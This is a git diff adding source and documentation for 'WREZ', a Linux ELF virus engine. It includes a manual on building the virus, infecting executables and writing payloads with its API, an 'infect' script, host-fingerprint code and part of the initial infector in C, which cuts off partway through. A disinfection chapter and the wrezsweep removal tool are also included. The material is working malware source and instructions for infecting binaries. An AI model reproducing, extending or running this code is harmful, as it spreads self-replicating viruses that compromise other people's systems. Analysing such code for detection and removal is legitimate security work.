+></usr/share/texmf/fonts/type1/bluesky/cm/cmtt10.pfb></usr/share/texmf/fonts/ty
+pe1/bluesky/cm/cmti10.pfb></usr/share/texmf/fonts/type1/bluesky/cm/cmbxti10.pfb
+></usr/share/texmf/fonts/type1/bluesky/cm/cmsy10.pfb></usr/share/texmf/fonts/ty
+pe1/bluesky/cm/cmr10.pfb></usr/share/texmf/fonts/type1/bluesky/cm/cmbx12.pfb>
+Output written on wrez.pdf (16 pages, 126833 bytes).
diff --git a/other/wrez/doc/wrez-manual/wrez.pdf b/other/wrez/doc/wrez-manual/wrez.pdf
new file mode 100644
index 0000000..48e25de
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.pdf
diff --git a/other/wrez/doc/wrez-manual/wrez.pg b/other/wrez/doc/wrez-manual/wrez.pg
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.pg
diff --git a/other/wrez/doc/wrez-manual/wrez.texinfo b/other/wrez/doc/wrez-manual/wrez.texinfo
new file mode 100644
index 0000000..cca64e1
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.texinfo
@@ -0,0 +1,635 @@
+\input texinfo
+@c %**start of header
+@setfilename wrez
+@settitle WREZ infection engine manual
+@c %**end of header
+
+@ifinfo
+This is the technical documentation and manual to the WREZ infection
+engine.
+
+Copyright @copyright{} 2002 Anonymous.
+@end ifinfo
+
+@titlepage
+@sp 10
+@center @titlefont{WREZ infection engine manual}
+@sp 2
+@center version 0.0
+
+@page
+@vskip 0pt plus 1filll
+Copyright @copyright{} 2002 Anonymous.
+@end titlepage
+
+@contents
+
+@comment node-name, next, previous, up
+@node Top, WREZ Introduction, , (dir)
+
+@menu
+* WREZ Introduction:: A short introduction about the engine
+* Index:: The alphabetical index
+@end menu
+
+
+@unnumbered WREZ Introduction
+
+This introduction will guide you through the rest of the manual and
+explains what its all about.
+
+@cindex about WREZ
+WREZ is a generic virus engine that provides a concise and powerful API to
+provide various functionality for payload code. It can be used to embed
+hostile code into and generally makes the world easier for this type of
+payload. Currently, it is designed to infect ELF executeables on the Linux
+operating system under the Intel IA32 architecture.
+
+@cindex engine code
+Most of the engine is written in position independant C code, while some
+low level parts are written in IA32 assembly. The engine consists of a
+number of independant modules. It is possible to enable and disable those
+modules individually to reduce the overall engine size.
+
+@cindex WREZ toolchain
+A complete toolchain around the engine is provided. It includes tools to
+infect executeable files, check for a possible infection and to disinfect
+binaries which are infected with WREZ. The buildprocess is controlled
+through a central @code{Makefile}, and a testing suite is provided to test
+and demonstrate certain features of the engine using example binaries.
+
+
+@chapter Using WREZ
+
+This chapter describes how to control the WREZ build process. It will show
+you how to enable and disable various features of the engine, how to
+produce an initial infector and how to use it to infect an arbitrary
+executeable.
+
+@cindex building WREZ
+@node Building WREZ,,,Top
+@section Building WREZ
+
+To build the engine from the sources, you need the complete GNU toolchain,
+which includes @command{gcc}, @command{ld}, @command{objdump},
+@command{objcopy}, @command{cpp} and @command{gmake}. Additionally you need
+the have the @command{nasm} assembler and the @command{awk} script language
+installed.
+
+Ensure all of the above tools are properly installed before proceeding.
+
+@cindex engine features, configuration
+@subsection Configuring engine features
+
+Open the @file{Makefile} file in your favorite editor. The first few lines
+are the configuration section of the @file{Makefile}, where you can enable
+and disable the features that will be in the virus produced. To enable
+them, uncomment them. Be aware that some features depend on other features,
+so only enable them in case you have this code enabled, too. To know what
+features you need, determine what functionality of the API you need for
+your payload. @xref{WREZ API}.
+
+@subsection Building the virus binary
+
+To build the virus binary, issue a "@command{make release}" command in the
+top directory. When the build succeeds, a new directory
+"@code{release-}@emph{version}" will be created accordingly and the following
+files are created there:
+@table @code
+@cindex release target, files created
+@item infect
+A simple wrapper to infect a single executeable with vanilla options.
+
+@item initial
+The more detailed infection program, offering a more precise control of the
+initial infection process.
+
+@item wrez.bin.conf
+This is a small configuration file providing some basic info about the
+@file{wrez.bin.out} file, such as certain relative file offsets where
+information can be stored. This file is important and is used by the
+@file{initial} infector.
+
+@item wrez.bin.out
+The central virus image, containing the virus code and additional
+configuration data. This is always the plain image, even when polymorph
+infection is used, hence you can disassemble it without any problems. Note
+that within an infected file this image is prepended with two opcodes:
+@code{pusha} and @code{pushf}. This makes up two extra bytes. The
+@file{initial} infector automatically cares for this, but it is important
+to remember when analyzing the image alone.
+
+@item wrezsweep
+This is the disinfection utility, which is able to disinfect any file
+infected with the version of the virus you just build. Keep this file safe,
+as it offers a reliable way for automatic detection and disinfection.
+@xref{wrezsweep utility}.
+
+@end table
+
+@cindex infect wrapper
+@section Infecting executeables using @command{infect}
+
+In most cases, after having build the virus image, you want to test it by
+infecting a sample executeable. To do this common operation the
+@command{infect} script has been created in the release directory. It is a
+wrapper around the @command{initial} program. Just run @command{infect}
+with the file you want to infect as argument:
+@example
+release % cp /bin/date .
+release % ./infect date | tail -2
+-rwx------    1 anon     anon        22820 Jan 11 18:38 date
+-rwx------    1 anon     anon        26437 Jan 11 18:39 date.infected
+release %
+@end example
+Note that @command{infect} automatically creates a copy of the file by
+appending @file{.infected} to the original filename.
+
+
+@cindex initial infector
+@section Infecting executeables using @command{initial}
+
+While the @command{infect} wrapper is what you commonly use, the background
+work is done by the @command{initial} program. It understands details about
+the virus structure and modifies them accordingly to make the virus work
+within the victim executeable. It provides a number of command line
+options, which are listed below.
+
+@cindex initial, command line options
+@subsection @command{initial} command line options
+
+@command{initial} @code{[-c config] [-i virus-image] <victim>}
+
+@table @code
+@cindex wrez.bin.out, configuration
+@item -c @emph{config}
+Allows to use another configuration file. The default is to use the
+@file{wrez.bin.conf} file which was created at the same time as the virus
+was build.
+
+@item -i @emph{outfile}
+Allows you to specify another virus image to use for infection. The default
+is to use the @file{wrez.bin.out} file created when the virus image was
+build. However, you might want to keep multiple different versions of the
+virus, and this option allows you to select which image file to use.
+
+@item victim
+This is a mandatory option since it tells the program which executeable to
+infect. Note that there are some restrictions on the filename length, so in
+case there is an error, try moving the file you want to infect to the local
+directory and use a shorter pathname as parameter.
+@end table
+
+Note that the @command{initial} program infects the victim executeable
+in-place, without creating a copy first.
+
+@chapter WREZ Source distribution files
+
+This chapter will explain the use of every source file within the wrez source
+distribution. It should provide a rough map where to modify the engine.
+
+@table @code
+@cindex source, files
+
+@item Makefile
+The main build targets Makefile. The most important targets are
+@command{release}, @command{dist}, @command{distclean} and @command{wrez}.
+The individual targets are described in details. @xref{Building WREZ}.
+
+@item common.c
+Provides inlined small assembly versions of the most commonly used memory
+functions, such as @code{strlen}, @code{memset} and similar functions.
+
+@item commontest.c
+A small testbed for the common functions, to ensure they are working
+properly.
+
+@item compress.sh
+This script is called whenever a new virus image is build. It builds the
+compressed virus image from the plain one, by detecting the boundary
+between decompression stub and payload, compressing the payload and then
+merging the decompression stub and compressed payload into the output file.
+While doing this multiple files are created which reflect the certain
+stages of the image. They can be very helpful when debugging the virus,
+especially when polymorphism is enabled.
+
+@item compressor.c
+The LZ compression code resides here. The decompression stub is in
+@file{wrez.asm} though. It is never used on its own, but called from within
+@file{compress.sh} instead.
+
+@item crypto-test.c
+Testbed for the functionality residing in @file{crypto.c}. The make target
+"@command{cryptotest}" drives this file.
+
+@item crypto.c
+@item crypto.h
+Various abstractions to the crypto layers in WREZ. Prototype definitions
+and API description for the functions reside in @file{crypto.h}.
+
+@item debug/
+Every small tool, script or helper application that is used only for the
+purpose of debugging the engine is put here. Each file is independant from
+the engine though, and you have to build them on your own.
+
+@item doc/
+Various piece of documentation, including this one resides here. The files
+@file{CHANGELOG} and @file{TODO} fullfil their usual purpose.
+
+@item fingerprint.c
+@item fingerprint.h
+The per-host fingerprinting code that is used throughout the engine for
+different things is hold here. The prototypes and documentations for the
+API reside in @file{fingerprint.h}.
+
+@item initial.c
+The source for the initial infector which is build into the
+@code{release-}@emph{version}@code{/} directory when building the
+"@code{release}" target.
+
+@item int80-net.h
+@item int80.h
+Inlined versions of syscalls. The @file{int80-net.h} file includes only
+network related socketcalls, while @file{int80.h} is the main syscall
+include file. Add needed syscalls here, but ensure they are behaving as
+documented on the manpage. Especially pay attention to what registers are
+clobbered and ensure correct stack correction.
+
+TODO
+@item isolation/
+@item lime-interface-test.c
+@item lime-interface-test.lds
+@item lime-interface.c
+@item lime-interface.h
+@item lime.asm
+@item lookup-example/
+@item lookup.c
+@item lookup.h
+@item obsolete/
+@item release-@emph{version}/
+@item tmp/
+@item unistd.h
+@item walker/
+@item wrconfig.h
+@item wrcore.c
+@item wrez-link.lds
+@item wrez.asm
+@item wrezdefs.h
+@item wrezdefs.inc
+@item wrezsweep.c
+@item wrutil.c
+
+@end table
+
+
+@chapter Limitations of viral code
+
+@node WREZ API,,,Top
+@chapter WREZ API
+
+The engine provides a helpful API to its payload code, which allows the
+payload to easily accomplish some common tasks. This chapter will explain
+the complete API and shows how to use it by giving small example code
+snippets.
+
+@cindex helper macros
+@section Helper macros
+
+WREZ provides some macros to work around the limitations of viral code,
+such as position indendance.
+
+@cindex STRINGPTR macro
+@subsection STRINGPTR macro
+The @code{STRINGPTR} macro provides a straightforward way to refer to a
+constant string. Note that the escape character '@code{\}' has to be
+escaped itself, as the macro runs through the C string processor twice.
+The macro sets a pointer to the string, as shown in this example:
+@example
+@{
+    char *  strptr;  /* pointer to ASCIIZ string */
+
+    STRINGPTR (strptr, "hello world\\n");
+@}
+@end example
+
+@cindex FUNCPTR macro
+@subsection FUNCPTR macro
+The @code{FUNCPTR} macro circumvents the limitations of obtaining the
+address of a virus function. In non position independant code, such as a
+normal executeable, it is possible to obtain the address to a function by
+simple referring the function name within an @emph{r-value} or by using the
+'@code{&}' operator. Within PIC code this is not possible, since the
+address is not known at link time. However, by use of the @code{FUNCPTR}
+macro a small instruction sequence is inlined into the code, which computes
+the correct address to a function. The following code would resolve the
+address of the @code{wrez_main} function:
+@example
+@{
+    void *  wrfunc;
+
+    FUNCPTR (wrfunc, "wrez_main");
+@}
+@end example
+
+@cindex system calls
+@section Calling syscalls
+
+The file @file{int80.h} provides inlined versions of a large number of
+common Linux system calls. To use them from within your payload code, just
+include the file and use the syscalls as usual. They get inlined into your
+code and behave as you would expect it. When a syscall is missing, copy the
+code of a syscall with the same number of arguments and rename it
+accordingly.
+
+@example
+
+#include "int80.h"
+...
+    /* use the fork syscall, see the fork(2) manpage */
+    while (fork ())
+        ;
+@end example
+
+@cindex library calls
+@section Library calls
+
+WREZ provides an API to resolve any function symbol of any shared object.
+This can be used to call functions from libraries such as @command{libc}.
+In the following example we run the shell command "@command{uname -a}"
+using the @command{system} library function.
+
+@example
+@{
+    char *  systemf;
+    char *  command;
+    int     (* system)(char *);
+
+    STRINGPTR (systemf, "system");
+    STRINGPTR (command, "uname -a");
+
+    system = symbol_resolve ((void *) cfg->elf_base, systemf);
+    if (system != NULL)
+        system (command);
+@}
+@end example
+
+All the symbol resolving is done with the help of the lookup module. The
+module provides the "@code{symbol_resolve}" function, which takes two
+parameters. The first parameter is the "@code{elf_base}", a pointer to the
+first byte of the ELF header. For normal Linux executeables it is usually
+@code{0x08048000}, but you can provide another address if you know it. This
+has some uses which are detailed later, when call hooking is discussed. The
+second parameter is a pointer to an ASCIIZ string with the function name
+you want to resolve. After processing the input parameters the function
+tries to resolve the symbol and upon success returns a pointer to the entry
+point of the function referred by the symbol. On failure, @code{NULL} is
+returned, which is checked for in the example code. After resolving the
+function can be used as if it would be a normal library call, as long as
+you keep the pointer to it.
+
+
+@cindex disinfection
+@chapter Disinfection
+
+When an executeable has been infected by a WREZ virus, nearly no
+information is lost. Hence it is possible to reconstruct a working
+executeable from the infected executeable, which does not include the virus
+code. The @command{wrezsweep} utility provides the functionality to detect
+and optionally remove and extract the viral code from an executeable. This
+chapter provides a description of the tool and advice for manual
+disinfection.
+
+It is not possible to reconstruct the original executeable perfectly, as
+two padding arrays are joined when infecting the file. Upon disinfection it
+is not clear where the original seperation was. It would be possible to
+store this information within the virus itself, but as the padding has no
+function besides aligning the following data, this was not done. As a
+result, the disinfected executeable may be up to 32 bytes longer than the
+original, uninfected executeable was. Every bit of functionality was
+preserved, though, and the binaries behave in exactly the same way. Also,
+the load image is exactly the same, only the dead file image may differ.
+
+@cindex disinfection, manual
+@section Manual disinfection
+
+With some knowledge of the ELF file format and the wrez infection method it
+is possible to disinfect an infected executeable manually. Please do not
+attempt disinfection without knowledge of the ELF format.
+
+First, the virus must be located within the file. Since the file could be
+infected only with section headers in the first place, you can use section
+headers to help you locate it. Infact, it may be the only reliable way to
+do this. To do this, first locate the end of the @code{.bss} section
+(@code{sh_offset} + @code{sh_size}). The @command{ht} and @command{biew}
+tools come in handy at this. Directly after the section ends, there is
+either the section header string table or there is virus code. The virus
+code starts with a fake @code{.ctors} address, so it looks like
+@example
+00006204: 08 F2 04 08 9C 60 E8 3D 00 00 00 C2 A8 04 08 07 01 00 00 98
+@end example
+Where @code{08 F2 04 08}, decoded as little endian 32 bit offset
+@code{0x0804f208} is the entry point of the virus. This is always the
+virtual address directly behind the address itself. So the code at the
+entry point starts with @code{9C 60 E8 3D 00 00 00}, which is a sequence of
+the @command{pusha, pushf, call $+0x3d} instructions. Everything from this
+offset (@code{0x6204}) up to the last byte of the data @code{PT_LOAD}
+segment belongs to the virus. This entire part of the file can be
+removed later and the data behind it has to slide to the front.
+
+But first its important to know the address of the @code{.ctors} section as
+the section header table shows it. As WREZ disguises the real address, and
+the real active @code{.ctors} address is independant from what the section
+header shows, the address of the @code{.ctors} section header is still the
+old original one. Just the one used to activate the @code{.ctors} in the
+code has changed upon infection. We have to change it back, so write the
+address down with the help of either @command{objdump} or @command{ht}.
+@example
+$ objdump -h infected | grep "\.ctors"
+ 17 .ctors        00000008  0804ee94  0804ee94  00005e94  2**2
+@end example
+So the virtual address is @code{0x0804ee94}, and the @code{.ctors} section
+starts at offset @code{0x5e94} within the file.
+
+@cindex removing the virus
+@subsection Step 1. Removing the virus code
+
+Now remove the virus code from the file and slide all the data behind it to
+the front. Slide it forward so that the first byte which was after the
+virus data now starts where the @code{.bss} section starts within the file.
+In the example from above, it would start at file offset @code{0x6204 -
+bss.sh_size}. Calculate the number of bytes you slided the data forward, it
+will be called @emph{displacement} from now on.
+
+Afterwards there are four things remaining that must be changed to repair
+the now damaged file. The next two steps are enough to make the file run
+again, without any virus code, while the last two steps will fixup the
+section headers, so that debug tools work on the file again.
+
+@cindex .ctors address, restoring the
+@subsection Step 2. Restoring @code{.ctors}
+
+To restore the @code{.ctors} activation code, you have to locate it within
+the file. To do this, just search for the virtual address the virus is
+mapped at. This is the same address we decoded above, minus four:
+@code{0x0804f204} (@code{= 0x0804f208 - 4}). This will result in at least
+one hit, which is within an immediate 32 bit register load, most likely
+into the @code{%ebx} register, so a possible hit will look like:
+@example
+00003C17: BB 04 F2 04 08 83 3D 04 F2 04 08 FF 74 0C 8B 03 FF D0 83 C3
+@end example
+Where the address is at @code{0x3c18} and @code{0xbb} is
+"@code{movl ..., %ebx}". Overwrite the address with the original one you
+extracted from the @code{.ctors} section header.
+
+@cindex PT_LOAD segment header, fixing the
+@subsection Step 3. Fixing @code{PT_LOAD} segment header
+
+Now, seek to the program header table and inspect the second @code{PT_LOAD}
+header. Both the @code{p_filesz} and @code{p_memsz} elements of the
+structure must be fixed. The @code{p_filesz} element must be decreased by
+the @emph{displacement}, which is the virus length plus the @code{.bss}
+section length. The @code{p_memsz} element must be decreased by just the
+virus in-memory length. So the entire calculation is this:
+@example
+        vlen_mem = ptl2.p_offset + ptl2.p_memsz;
+        vlen_mem -= bss.sh_offset + bss.sh_size;
+        vlen_file = ptl2.p_offset + ptl2.p_filesz;
+        vlen_file -= bss.sh_offset;
+
+        ptl2.p_filesz -= vlen_file;
+        ptl2.p_memsz -= vlen_mem;
+@end example
+
+@cindex section header table offset, fixing the
+@subsection Step 4. Fixing @code{eh_shoff} ELF header entry
+
+Decrease the @code{eh_shoff} ELF header element by @emph{displacement}.
+Since the section header table usually lies after and @code{PT_LOAD}
+segments, it is moved by removing the virus code from the executeable and
+we have to fix the section header table offset.
+
+@cindex section header table, fixing the
+@subsection Step 5. Fixing section header table
+
+As final step we have to fix any section header that is refering to data
+that was behind the virus, as it was slided to the front by
+@emph{displacement} bytes. Examine every section header at @code{eh_shoff},
+and correct the @code{sh_offset} elements if they lie behind the last byte
+refered by the @code{PT_LOAD} data segment.
+
+@example
+    for (n = 0 ; n < elfhdr.e_shnum ; ++n) @{
+        if (sectionhdr[n].sh_offset > (ptl2.p_offset + ptl2.p_filesz))
+            sectionhdr[n].sh_offset -= displacement;
+    @}
+@end example
+
+@node wrezsweep utility,,,Top
+@cindex wrezsweep utility
+@section @command{wrezsweep} utility
+
+The @command{wrezsweep} utility is very natural to use. In its default mode
+it takes filenames provided on the command line. Each filename is checked
+for infections, after it has been ensured its a @code{ET_EXEC},
+@code{EM_386} executeable. When an infection is found a message is printed
+and details are shown. When disinfection has been enabled, it automatically
+tries to disinfect the file. Enabling the verbose mode is a good idea when
+you know about the internals or you are about to disinfect the file
+manually. The utility will most likely detect other viruses, which use the
+same infection method, such as the
+@cindex VIT virus
+@emph{VIT virus}, written by silvio. Disinfection uses details related to
+the workings of the WREZ engine however, so it is not possible to disinfect
+files which are infected with other viruses.
+
+@subsection @command{wrezsweep} command line options
+@command{wrezsweep} @code{[-hxDv] [-d virus] <file1 [file2 [...]]>}
+
+@table @code
+@cindex wrezsweep help
+@item -h
+Print the usage and exit.
+
+@cindex disinfection, automatic
+@item -x
+Once an infection has been detected, try to disinfect the file in-place.
+
+@cindex polymorph disinfection
+@item -D
+Fall back to extract the correct original @code{.ctors} address from the
+section header table instead of parsing the virus configuration structure.
+This has to be used to deal with binaries that are infected with a
+polymorph version of the virus. Generally has no negative effect.
+
+@cindex wrezsweep verbose mode
+@item -v
+Be more verbose, especially when disinfecting files.
+
+@cindex virus extraction, automatic
+@item -d virus
+Extract the entire virus body from the file and save it to "@file{virus}".
+Note that the @code{.ctors} address is not included in the body. However,
+it is shown when detecting an infected file.
+
+@item file1, file2, @dots{}, file@emph{n}
+Files to scan for infections. Once an infection is noticed, appropiate
+actions are taken, as controlled by the other command line options.
+
+@end table
+
+@cindex wrezsweep example
+@subsection @command{wrezsweep} example use
+
+In the following example we use the @command{wrezsweep} utility to
+disinfect an infected copy of the @file{date} executeable. The infected
+copy is called @file{date.infected}.
+
+@example
+$ ls -l date date.infected ; \
+> ./wrezsweep -x -v date date.infected ; \
+> ls -l date date.infected
+
+-rwx------    1 anon     anon        22820 Apr 10 22:30 date
+-rwx------    1 anon     anon        26962 Apr 10 22:30 date.infected
+
+wrezsweep - version 0.2
+
+scanning 2 files
+disinfection enabled
+====================================================================
+FILE date
+CLEAN: date
+FILE date.infected
+WARNING: file "date.infected", possible infection detected !
+         memory: 8856 bytes at 0x0804f204
+           file: 3638 (+5218 mem) bytes at 0x00006204
+DISINFECTING
+   old   ctors address: 0x0804ee94
+   virus ctors address: 0x0804f204
+   scanning for 0x0804f204 in: [0x0 - 0x5e54]
+   found virus ctors activation code within crt0.o at: 0x00003c18
+   scanning for 0x0804f204 in: [0x3c18 - 0x3c58]
+   found second virus ctors activation code at: 0x00003c1e
+   restored old ctors address
+   disabled virus activation, viral code is still in file, though
+   sliding 0x4d0 bytes at the end of file (0x101a bytes forward)
+   section 24 fixed
+   successfully removed viral code from file
+
+-rwx------    1 anon     anon        22820 Apr 10 22:30 date
+-rwx------    1 anon     anon        22840 Apr 10 22:30 date.infected
+
+$
+@end example
+
+As you can see, the disinfected version of the file is 20 bytes larger than
+the original version. This extra space comes from unused section padding
+and has no effect on how the file behaves.
+
+@node Index,,, Top
+@unnumbered Index
+
+@printindex cp
+
+@bye
+
diff --git a/other/wrez/doc/wrez-manual/wrez.toc b/other/wrez/doc/wrez-manual/wrez.toc
new file mode 100644
index 0000000..51dde2a
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.toc
@@ -0,0 +1,27 @@
+\unnumbchapentry{WREZ Introduction}{1}
+\chapentry{Using WREZ}{1}{2}
+\secentry{Building WREZ}{1}{1}{2}
+\subsecentry{Configuring engine features}{1}{1}{1}{2}
+\subsecentry{Building the virus binary}{1}{1}{2}{2}
+\secentry{Infecting executeables using \command {infect}}{1}{2}{3}
+\secentry{Infecting executeables using \command {initial}}{1}{3}{3}
+\subsecentry{\command {initial} command line options}{1}{3}{1}{3}
+\chapentry{WREZ Source distribution files}{2}{4}
+\chapentry{Limitations of viral code}{3}{6}
+\chapentry{WREZ API}{4}{7}
+\secentry{Helper macros}{4}{1}{7}
+\subsecentry{STRINGPTR macro}{4}{1}{1}{7}
+\subsecentry{FUNCPTR macro}{4}{1}{2}{7}
+\secentry{Calling syscalls}{4}{2}{7}
+\secentry{Library calls}{4}{3}{8}
+\chapentry{Disinfection}{5}{9}
+\secentry{Manual disinfection}{5}{1}{9}
+\subsecentry{Step 1. Removing the virus code}{5}{1}{1}{10}
+\subsecentry{Step 2. Restoring \code {.ctors}}{5}{1}{2}{10}
+\subsecentry{Step 3. Fixing \code {PT_LOAD} segment header}{5}{1}{3}{10}
+\subsecentry{Step 4. Fixing \code {eh_shoff} ELF header entry}{5}{1}{4}{10}
+\subsecentry{Step 5. Fixing section header table}{5}{1}{5}{10}
+\secentry{\command {wrezsweep} utility}{5}{2}{11}
+\subsecentry{\command {wrezsweep} command line options}{5}{2}{1}{11}
+\subsecentry{\command {wrezsweep} example use}{5}{2}{2}{11}
+\unnumbchapentry{Index}{13}
diff --git a/other/wrez/doc/wrez-manual/wrez.tp b/other/wrez/doc/wrez-manual/wrez.tp
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.tp
diff --git a/other/wrez/doc/wrez-manual/wrez.vr b/other/wrez/doc/wrez-manual/wrez.vr
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/other/wrez/doc/wrez-manual/wrez.vr
diff --git a/other/wrez/fingerprint.c b/other/wrez/fingerprint.c
new file mode 100644
index 0000000..a7b3365
--- /dev/null
+++ b/other/wrez/fingerprint.c
@@ -0,0 +1,21 @@
+
+#include "int80.h"
+#include "unistd.h"
+#include "fingerprint.h"
+#include "crypto.h"
+
+
+unsigned int
+fp_get (void)
+{
+        unsigned int    hash;
+        struct utsname  thishost;
+
+
+        uname (&thishost);
+        hash = mhash ((unsigned char *) &thishost, sizeof (thishost));
+
+        return (hash);
+}
+
+
diff --git a/other/wrez/fingerprint.h b/other/wrez/fingerprint.h
new file mode 100644
index 0000000..a53ff14
--- /dev/null
+++ b/other/wrez/fingerprint.h
@@ -0,0 +1,15 @@
+
+#ifndef FINGERPRINT_H
+#define FINGERPRINT_H
+
+/* fp_get
+ *
+ * get a 32 bit host fingerprint hash build out of 'struct utsname' uname
+ * output
+ *
+ * return hash value
+ */
+unsigned int fp_get (void);
+
+#endif
+
diff --git a/other/wrez/fingerprint.o b/other/wrez/fingerprint.o
new file mode 100644
index 0000000..abe5ee8
--- /dev/null
+++ b/other/wrez/fingerprint.o
diff --git a/other/wrez/infect b/other/wrez/infect
new file mode 100755
index 0000000..2ddbe11
--- /dev/null
+++ b/other/wrez/infect
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+if [ $# != 1 ]; then
+        echo "usage: $0 pathname"
+        echo
+        exit
+fi
+cp $1 victim
+./initial victim
+mv victim $1.infected
+ls -l $1 $1.infected
diff --git a/other/wrez/initial b/other/wrez/initial
new file mode 100755
index 0000000..5832f09
--- /dev/null
+++ b/other/wrez/initial
diff --git a/other/wrez/initial.c b/other/wrez/initial.c
new file mode 100644
index 0000000..8dfc0e3
--- /dev/null
+++ b/other/wrez/initial.c
@@ -0,0 +1,237 @@
+
+/* initial infector which infects exactly one given binary with the virus
+ * this is necessary because we only have the virus in raw binary form after
+ * the build has taken place (i.e. no executeable elf file). so we have two
+ * choices, either putting together a proper initial elf file, or executing
+ * it as if it would already have infected a process (this one). the later is
+ * easier, as we have to fixup some compression-related data in the raw data
+ * anyway.
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#pragma pack(1)
+#include "wrconfig.h"
+
+void usage (char *progname);
+
+char *  configfile = "wrez.bin.conf";
+
+
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-c config] [-i binary.out] <victim>\n"
+                "\n", progname);
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+        FILE *          bfp;
+        char *          infile = "wrez.bin.out";
+        long int        infile_len;
+        unsigned char * infile_data;
+        unsigned int    cfg_delta,
+                        decomp_len;
+        wrconfig *      cfg;
+        wrdynconfig     dcfg;
+        unsigned short  llstuff, hl2stuff, hf2stuff;
+        char *          victim;
+
+        char            c;
+        char *          progname;
+        FILE *          cfgfp;
+        char            cfgline[128];
+        char            lzstr[128];
+
+
+        fprintf (stderr, "wrez engine - initial infector\n\n");
+
+        progname = argv[0];
+        if (argc < 2)
+                usage (progname);
+
+        while ((c = getopt (argc, argv, "c:i:")) != EOF) {
+                switch (c) {
+                case 'c':
+                        configfile = optarg;
+                        break;
+                case 'i':
+                        infile = optarg;
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+
+        victim = argv[argc - 1];
+        if (victim[0] == '-')
+                usage (progname);
+
+        /* read in configuration file
+         */
+        cfgfp = fopen (configfile, "r");
+        if (cfgfp == NULL) {
+                perror ("fopen configfile");
+                exit (EXIT_FAILURE);
+        }
+
+        while (fgets (cfgline, sizeof (cfgline), cfgfp) != NULL) {
+                unsigned char   keyword[16];
+
+                if (sscanf (cfgline, "%15[^ ]", keyword) != 1) {
+                        fprintf (stderr, "invalid configuration file\n");
+                        exit (EXIT_FAILURE);
+                }
+
+                /* XXX: kludge, put a better parser in here
+                 */
+                if (strcmp (keyword, "configrel") == 0) {
+                        if (sscanf (cfgline, "configrel %u", &cfg_delta) != 1) {
+                                fprintf (stderr, "invalid configrel\n");
+                                exit (EXIT_FAILURE);
+                        }
+                } else if (strcmp (keyword, "skip") == 0) {
+                        if (sscanf (cfgline, "skip %u", &decomp_len) != 1) {
+                                fprintf (stderr, "invalid skip\n");
+                                exit (EXIT_FAILURE);
+                        }
+                } else if (strcmp (keyword, "compress") == 0) {
+                        if (sscanf (cfgline, "compress %127s", lzstr) != 1) {
+                                fprintf (stderr, "invalid compress\n");
+                                exit (EXIT_FAILURE);
+                        }
+                } else {
+                        fprintf (stderr, "invalid configuration file\n");
+                        exit (EXIT_FAILURE);
+                }
+        }
+
+        if (strlen (victim) >= sizeof (cfg->dyn.vinit.victim)) {
+                fprintf (stderr, "temporary victim filename can be no longer "
+                        "than %d characters, yours is %d chars.\n",
+                        sizeof (cfg->dyn.vinit.victim) - 1,
+                        strlen (victim));
+
+                exit (EXIT_FAILURE);
+        }
+
+        bfp = fopen (infile, "rb");
+        if (bfp == NULL) {
+                perror ("fopen");
+
+                exit (EXIT_FAILURE);
+        }
+
+        fseek (bfp, 0, SEEK_END);
+        infile_len = ftell (bfp);
+        fseek (bfp, 0, SEEK_SET);
+
+        infile_data = calloc (1, infile_len + 64 * 1024 + 2);
+        infile_data[0] = 0x9c;  /* pushf */
+        infile_data[1] = 0x60;  /* pusha */
+
+        if (fread (infile_data + 2, 1, infile_len, bfp) != infile_len) {
+                fprintf (stderr, "failed to read %s into memory, expected %ld "
+                        "bytes, got less.\n", infile, infile_len);
+                exit (EXIT_FAILURE);
+        }
+        fclose (bfp);
+
+        printf ("# successfully read %ld bytes into memory\n", infile_len);
+        printf ("# fixing configuration structure\n");
+
+
+        /* get new configuration structure, and change important settings:
+         *
+         * wr_start = virtual address of first byte of virus (dynamic)
+         * decomp_len = length of the decompression stub (static)
+         * victim = first-infection victim filename (dynamic), later used
+         *     for flag data, see wrconfig.h
+         * cmprlen, llstuff, hl1stuff, hl2stuff, hf2stuff = decompression
+         *     related data used by the decompression stub (static)
+         */
+        cfg = (wrconfig *) (&infile_data[2] + cfg_delta);
+
+        printf ("# .. wr_start [0x%08lx] -> ", cfg->wr_start);
+        cfg->wr_start = (unsigned long int) &infile_data[2];
+        printf ("[0x%08lx]\n", cfg->wr_start);
+
+        printf ("# .. decomp_len [%ld] -> ", cfg->decomp_len);
+        cfg->decomp_len = decomp_len;
+        printf ("[%ld]\n", cfg->decomp_len);
+
+        printf ("# .. elf_base [0x%08lx] -> ", cfg->elf_base);
+        cfg->elf_base = 0x08048000;     /* XXX: kludge, hardcoded values */
+        printf ("[0x%08lx]\n", cfg->elf_base);
+
+        printf ("# .. dyn.vinit.victim[%d] \"%s\" -> ",
+                sizeof (cfg->dyn.vinit.victim),
+                cfg->dyn.vinit.victim);
+        memcpy (cfg->dyn.vinit.victim, victim, strlen (victim) + 1);
+        printf ("\"%s\" (%d + 1 bytes)\n", cfg->dyn.vinit.victim,
+                strlen (victim));
+
+        /* TODO: initialize dcfg structure
+         */
+        dcfg.cnul = 0x00;
+        dcfg.flags = 0;
+        WRF_SET (dcfg.flags, WRF_GENERATION_LIMIT);
+        dcfg.icount = 3;        /* three propagations, then infertile */
+        WRF_SET (dcfg.flags, WRF_GET_FINGERPRINT);
+        memcpy (dcfg.xxx_temp, "victim", 7);
+
+        if (sizeof (wrdynconfig) > (VICTIM_LEN + sizeof (void *))) {
+                fprintf (stderr, "FATAL: sizeof wrdynconfig exceeds space: "
+                        "%d > %d\n", sizeof (wrdynconfig), (VICTIM_LEN +
+                        sizeof (void *)));
+
+                exit (EXIT_FAILURE);
+        }
+
+        printf ("# .. dyn.vinit.vcfgptr [0x%08lx] -> ",
+                (unsigned long int) cfg->dyn.vinit.vcfgptr);
+        cfg->dyn.vinit.vcfgptr = &dcfg;
+        printf ("[0x%08lx]\n", (unsigned long int) cfg->dyn.vinit.vcfgptr);
+
